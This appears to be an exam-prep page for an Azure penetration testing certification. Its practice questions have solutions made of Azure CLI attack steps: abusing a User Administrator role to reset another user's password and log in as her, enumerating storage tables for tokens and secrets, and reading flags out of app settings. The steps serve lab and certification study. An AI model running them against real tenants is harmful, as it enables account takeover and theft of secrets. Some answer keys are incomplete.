Key details for this exam, checked against the published exam outline
Each question shows the correct answer and an explanation of why it is right
Using the previously gained access to the Azure environment, extract an access token from the Web App's environment and use it to impersonate its Managed Identity. Which of the following roles is assigned to the Web App's Security Principal?
Detailed Solution:
First identify the managed identity attached to the Web App.
az webapp identity show \
--name RnD-Tools \
--resource-group Excalibur-Resources \
--output json
You should see a user-assigned managed identity similar to:
{
'userAssignedIdentities': {
'/subscriptions/7403ec86-c39d-4d80-9efa-35c7580ecefa/resourceGroups/Excalibur-Resources/providers/Microsoft.ManagedIdentity/userAssignedIdentities/WebAppTokenIdentity': {
'clientId': 'cf3664d4-5cec-4feb-b0ef-88b7958809df',
'principalId': 'efe89e83-010f-42f6-9576-30531fa47af7'
}
}
}
Now query the role assignments for the managed identity's principal ID:
az role assignment list \
--assignee efe89e83-010f-42f6-9576-30531fa47af7 \
--all \
--output table
The returned custom role is:
AppService-Auditor
That makes option D correct.
Final Answer:
A virtual machine has a system-assigned managed identity. From the VM shell, which Azure CLI command authenticates using that identity?
A. az login --service-principal B. az login --identity C. az account get-access-token --tenant D. az ad signed-in-user show
Detailed Solution:
On an Azure VM with a system-assigned managed identity, run:
az login --identity
Then verify:
az account show
For a user-assigned managed identity, specify the client ID:
az login --identity --client-id <client-id>
Microsoft's Azure CLI documentation confirms az login --identity for system-assigned managed identities and --client-id, --object-id, or --resource-id for user-assigned identities.
Correct answer:
SIMULATION
Using the Azure access of the second compromised user, perform lateral movement within the environment to discover sensitive information. What is the flag uncovered during this activity?
The answer is the flag found after compromising the target user and enumerating her accessible Azure resources, usually storage/table data.
Detailed Solution:
Since the second compromised user is a User Administrator, abuse that role to reset the password of the target user.
az ad user update \
--id [email protected] \
--password 'NewP@ssw0rd12345!' \
--force-change-password-next-sign-in false
Now authenticate as the target user.
az login -u [email protected] -p 'NewP@ssw0rd12345!'
Confirm the login context:
az account show
Check what Azure resources this user can see:
az resource list --output table
Check role assignments:
az role assignment list --all --output table
If the user has storage data-plane permissions, enumerate storage accounts:
az storage account list --output table
If the storage account is known from the lab chain, use it directly:
az storage table list \
--account-name excaliburstore \
--auth-mode login \
--output table
Query each table:
az storage entity query \
--account-name excaliburstore \
--table-name <table-name> \
--auth-mode login \
--output json
A faster method:
for table in $(az storage table list --account-name excaliburstore --auth-mode login --query '[].name' -o tsv); do
echo ' $table '
az storage entity query \
--account-name excaliburstore \
--table-name '$table' \
--auth-mode login \
--output table
done
Search the output for:
Flag
SAS
token
container
storage
secret
The flag discovered in this stage is the Q7 answer.
Final Answer:
Use the Flag{...} value returned from the accessible table/storage data after logging in as [email protected].
SIMULATION
A storage account allows public blob access. Enumerate containers and identify the public container that exposes backup files.
public-backups
Detailed Solution:
Try listing containers using Azure CLI:
az storage container list \
--account-name prodreportstore01 \
--auth-mode login \
--output table
If anonymous access is allowed, test via blob endpoint:
az storage blob list \
--account-name prodreportstore01 \
--container-name public-backups \
--auth-mode key \
--output table
In a lab, you can also test the public URL pattern:
https://prodreportstore01.blob.core.windows.net/public-backups/
Expected exposed container:
public-backups
Final answer:
public-backups
SIMULATION
During App Service enumeration, you discover that the compromised user can read App Service application settings. Find the hidden flag stored in the application settings.
Flag{app_settings_should_not_store_secrets}
Detailed Solution:
Query App Service settings:
az webapp config appsettings list \
--name finance-reporting-api \
--resource-group rg-prod-apps-eastus \
--output json
Search for suspicious keys:
az webapp config appsettings list \
--name finance-reporting-api \
--resource-group rg-prod-apps-eastus \
--query '[?contains(name, 'FLAG') || contains(name, 'Flag') || contains(name, 'SECRET')]' \
--output table
Expected output:
Name SlotSetting Value
---------- ------------- ----------------------------------------
APP_FLAG False Flag{app_settings_should_not_store_secrets}
The flag is:
Flag{app_settings_should_not_store_secrets}
SIMULATION
After gaining access to the Azure tenant, enumerate all resource groups available to the compromised user. One resource group contains the word prod. What is the name of that resource group?
rg-prod-apps-eastus
Detailed Solution:
List accessible resource groups:
az group list --output table
For a cleaner search:
az group list \
--query '[?contains(name, 'prod')].{Name:name,Location:location}' \
--output table
Expected output:
Name Location
-------------------- ----------
rg-prod-apps-eastus eastus
The resource group containing prod is:
rg-prod-apps-eastus
Exam domains verified against: Official The SecOps Group CCPenX-Az exam guide, last checked September 2026.
Master Azure DNS enumeration, IP and host discovery, and portal endpoint identification. Discover Entra ID tenants, enterprise applications, and identify publicly accessible resources including blob URLs and app services.
Sample question from this domain above: Q6
Enumerate Entra ID users, groups, and roles, then abuse misconfigured role assignments. Target Conditional Access and MFA bypass techniques, exploit federated identities, and manipulate Azure AD tokens including refresh and access token abuse.
Exploit misconfigured storage accounts, key vaults, and logic apps. Abuse Azure App Service environments, Automation Accounts, and managed identities. Extract secrets from custom script extensions and leverage resource graph for reconnaissance.
Sample question from this domain above: Q4
Identify SSRF, RCE, IDOR, and insecure deserialization in Azure hosted applications. Detect overprivileged OAuth apps and misconfigured API Management. Analyze RBAC misconfigurations and exploit Azure Arc or Bastion weaknesses.
Steal and reuse Azure tokens via compromised services or proxies. Extract secrets from key vaults and app configs. Execute lateral movement through function apps and automation accounts, then establish persistence using app registrations and service principals.
Common questions about the exam itself